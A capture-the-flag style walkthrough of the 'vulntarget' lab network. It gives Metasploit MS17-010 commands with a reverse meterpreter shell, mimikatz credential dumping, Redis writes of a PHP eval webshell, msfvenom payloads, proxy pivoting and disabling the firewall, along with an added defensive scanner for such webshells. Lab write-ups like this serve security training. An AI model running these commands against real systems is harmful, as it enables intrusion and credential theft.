Title: vulntarget shooting range series-a-writeup

Network Configuration

External network WIN7:
    ip1: 192.168.127.91/255.255.255.0, gw: 192.168.127.2 (NAT mode)
    ip2: 10.0.20.98 - vmnet1 (host-only mode)
Domain member host:
    10.0.20.99 - vmnet1 (host-only mode)
    10.0.10.111 - vmnet2 (host-only mode)
Domain controller:
    10.0.10.110 - vmnet2 (host-only mode)
Password configuration:
    Win7: win7/admin
    win2016: Administrator/Admin@123, vulntarget.com\win2016 Admin#123
    win2019: vulntarget.com\administrator Admin@666

Information Collection

Scan for live hosts in the same network segment:
    arp-scan -l
A live host is discovered: 192.168.127.91. Next, port-scan the IP address of the live target machine.

    nmap -sC -T4 192.168.127.91
The target system is found to be Win7 with port 445 open. Try Eternal Blue (MS17-010) against the target.

Intranet host penetration

Enter the following commands in Kali:
    msfconsole
    msf6 > search 17-010
    msf6 > use 0
    msf6 > set payload windows/x64/meterpreter/reverse_tcp
    msf6 > set lport 6666
    msf6 > set lhost 192.168.127.129
    msf6 > set rhosts 192.168.127.91
    msf6 > run
    meterpreter > shell
    C:\Windows\System32> ipconfig
I found some garbled output, so I just set the code page:
    C:\Windows\System32> chcp 65001     # 65001 is the UTF-8 code page
    C:\Windows\System32> ipconfig       # I found two network segments: 192.168.127.x and 10.0.20.x
    C:\Windows\System32> whoami         # check the current user's privileges: SYSTEM
    C:\Windows\System32> tasklist /svc  # view the processes; no AV ("killer") is running on the system
    C:\Windows\System32> exit           # exit the shell
    meterpreter > load kiwi             # load the mimikatz module
    meterpreter > creds_all             # dump the login credentials of all current users: the user name is win7 and the password is admin

Web penetration

Accessing http://192.168.127.91/ directly shows that the site is Tongda OA. The version of Tongda OA can be read from http://192.168.127.91/inc/expired.php; the current version is 11.3. A search-engine query for Tongda OA 11.3 turns up a known file inclusion vulnerability: https://blog.csdn.net/hackzkaq/article/details/115900500. A one-click graphical tool is used to obtain a webshell, and AntSword connects to it successfully. In the AntSword command terminal, the current user again has SYSTEM privileges.

Lateral movement

The shell obtained through the exploit lives in the exploited process and is extremely fragile, so the meterpreter session should be migrated into a stable process on the target machine. Migration writes nothing to disk, which makes the intrusion harder to detect.

After running the automatic migration command (run post/windows/manage/migrate), the system automatically finds a suitable process and migrates meterpreter into it:
    meterpreter > run post/windows/manage/migrate   # migrated from spoolsv.exe (PID 1080) to notepad.exe (PID 4800)
View the local subnets:
    meterpreter > run get_local_subnets
Add a dynamic route:
    meterpreter > run autoroute -s 10.0.20.0/24
or
    meterpreter > background
    msf6 > sessions
    msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/autoroute
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set session 1
    msf6 exploit(windows/smb/ms17_010_eternalblue) > run
    meterpreter > background
Discover live hosts:
    msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/arp_scanner
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set session 1
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.0.20.1-254
    msf6 exploit(windows/smb/ms17_010_eternalblue) > run
Another live host is found: 10.0.20.99. Enable the socks5 proxy:
    msf6 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/server/socks_proxy
    msf6 auxiliary(server/socks_proxy) > run
Before port scanning, the /etc/proxychains4.conf configuration file must be modified.

    vim /etc/proxychains4.conf
    socks5 127.0.0.1 1080
Scan the commonly used ports of the target IP with nmap through proxychains:
    proxychains nmap -sT -Pn 10.0.20.99 -p22,23,80,139,445,1433,3306,3389,6379,8080
Host 10.0.20.99 has ports 6379 and 80 open. On the local host, the Proxifier software serves as the socks5 proxy client. A dirsearch scan finds that the target has a sensitive phpinfo.php page:
    python3 dirsearch.py -l url.txt -t 10 -e * -i 200,302 --format csv -o C:\Users\backlion\Desktop\dirsearch-master\xxx.com.csv
or, from the Kali attack machine through proxychains:
    proxychains python dirsearch.py -u http://10.0.20.99 -i 200
    proxychains dirsearch -u "http://10.0.20.99" --proxy=socks5://127.0.0.1:1080 -t 5
Visiting http://10.0.20.99/phpinfo.php reveals the absolute path of the website: C:/phpStudy/PHPTutorial/WWW/

http://10.0.20.99/l.php

Redis Unauthorized Access

Connect remotely without a password using the redis-cli command:
    proxychains redis-cli -h 10.0.20.99

Redis writes to webshell

    10.0.20.99:6379> CONFIG set dir 'C:/phpStudy/PHPTutorial/WWW/'    # switch the dump directory to the absolute path where the shell can be written
    10.0.20.99:6379> set x '\n\n\n<?php @eval($_POST['x']);\n\n\n'    # write the one-line webshell
    10.0.20.99:6379> config set dbfilename shell.php                   # set the dump file name to shell.php
    10.0.20.99:6379> save
AntSword on the local host then connects to the webshell through the proxy. The current user has SYSTEM privileges.
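A defender-side check added here, not part of the original writeup: a PHP file dropped through `config set dbfilename` plus `save` is a Redis RDB dump, so it starts with the RDB magic `REDIS` and a version number rather than `<?php`. The scanner below walks a web root for files that carry that header or an eval()-on-request-input marker; the sample web root and its file contents are constructed for the example.

```python
import os
import re
import tempfile

# RDB dumps begin with "REDIS" plus a four-digit version, e.g. b"REDIS0009".
RDB_MAGIC = re.compile(rb"^REDIS\d{4}")
# Markers typical of a one-line shell that evaluates request input.
SHELL_MARKERS = (rb"eval($_POST", rb"eval($_GET", rb"eval($_REQUEST")


def classify(path):
    """Return findings for one file: 'rdb-header' when it is a Redis dump,
    'webshell-marker' when it contains an eval()-on-input pattern."""
    with open(path, "rb") as fh:
        head = fh.read(64 * 1024)  # header plus a small payload is enough
    findings = []
    if RDB_MAGIC.match(head):
        findings.append("rdb-header")
    if any(marker in head for marker in SHELL_MARKERS):
        findings.append("webshell-marker")
    return findings


def scan_webroot(root, exts=(".php", ".phtml")):
    """Walk `root` and return {relative_path: findings} for every hit."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            full = os.path.join(dirpath, name)
            findings = classify(full)
            if findings:
                hits[os.path.relpath(full, root)] = findings
    return hits


def build_sample_webroot():
    """Constructed sample: a clean page, a hand-written shell, an RDB-dropped shell."""
    root = tempfile.mkdtemp(prefix="webroot-")
    clean = b"<?php echo 'hello'; ?>"
    handwritten = b"<?php @eval($_POST['x']); ?>"
    # Shape of what `save` leaves behind: RDB header and aux field, then the
    # key "x" with its 31-byte value, then the EOF marker and checksum bytes.
    rdb_dropped = (b"REDIS0009\xfa\tredis-ver\x055.0.0\xfe\x00\x00\x01x"
                   b"\x1f\n\n\n<?php @eval($_POST['x']);\n\n\n\xff" + b"\x00" * 8)
    for name, data in (("index.php", clean), ("a.php", handwritten), ("shell.php", rdb_dropped)):
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return root
```

Running `scan_webroot` over a real web root after an incident flags both the RDB-written file and any hand-placed eval shells in one pass.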

Upload MSF backdoor

Generate a bind (forward) payload:
    msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=3333 -f exe -o shell.exe
Use AntSword to upload shell.exe to 10.0.20.99 and execute it, then configure the listener:

    use exploit/multi/handler
    set payload windows/x64/meterpreter/bind_tcp
    set lport 3333
    set RHOST 10.0.20.99
    run
Disable the firewall:
    netsh firewall set opmode mode=disable
Run shell.exe in the AntSword command terminal. Collect the hosts in the same network segment:
    meterpreter > arp
Scan the 10.0.10.110 network segment and migrate the process:
    meterpreter > run post/windows/manage/migrate
